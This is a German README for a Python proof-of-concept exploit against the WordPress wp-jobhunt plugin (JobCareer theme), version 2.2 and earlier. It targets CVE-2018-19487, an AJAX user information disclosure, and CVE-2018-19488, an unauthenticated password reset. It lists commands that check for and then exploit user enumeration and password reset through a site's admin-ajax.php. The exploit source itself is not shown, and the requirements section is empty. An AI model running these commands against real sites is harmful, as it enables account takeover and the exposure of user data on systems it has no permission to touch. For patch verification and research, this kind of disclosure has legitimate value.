
CVE-2018-19487, CVE-2018-19488, Exploit für das WordPress-Plugin wp-jobhunt
CVE-2018-19487, CVE-2018-19488, Exploit für das WordPress-wp-jobhunt-Plugin
Das wp-jobhunt-Plugin ist ein Plugin, das mit dem JobCareer-Theme verwendet wird:
https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636 (siehe Changelog unten)
Python-Exploit für CVE-2018-19487 (AJAX-Benutzerinformationsoffenlegung) und CVE-2018-19488 (AJAX-Passwortzurücksetzung für Benutzer) für Version 2.2 und früher.
ANFORDERUNGEN:
VERWENDUNG:
Prüfen, ob eine Schwachstelle für Benutzeraufzählung vorliegt:
python poc.py --checkenum https://wpsite/path/to/wp-admin/admin-ajax.php
Prüfen, ob eine Schwachstelle bei der Passwortzurücksetzung von Benutzern vorliegt:
python poc.py --checkreset https://wpsite/path/to/wp-admin/admin-ajax.php
Benutzeraufzählung ausnutzen:
python poc.py --enum https://wpsite/path/to/wp-admin/admin-ajax.php
Passwortzurücksetzung von Benutzern ausnutzen:
python poc.py --reset https://wpsite/path/to/wp-admin/admin-ajax.php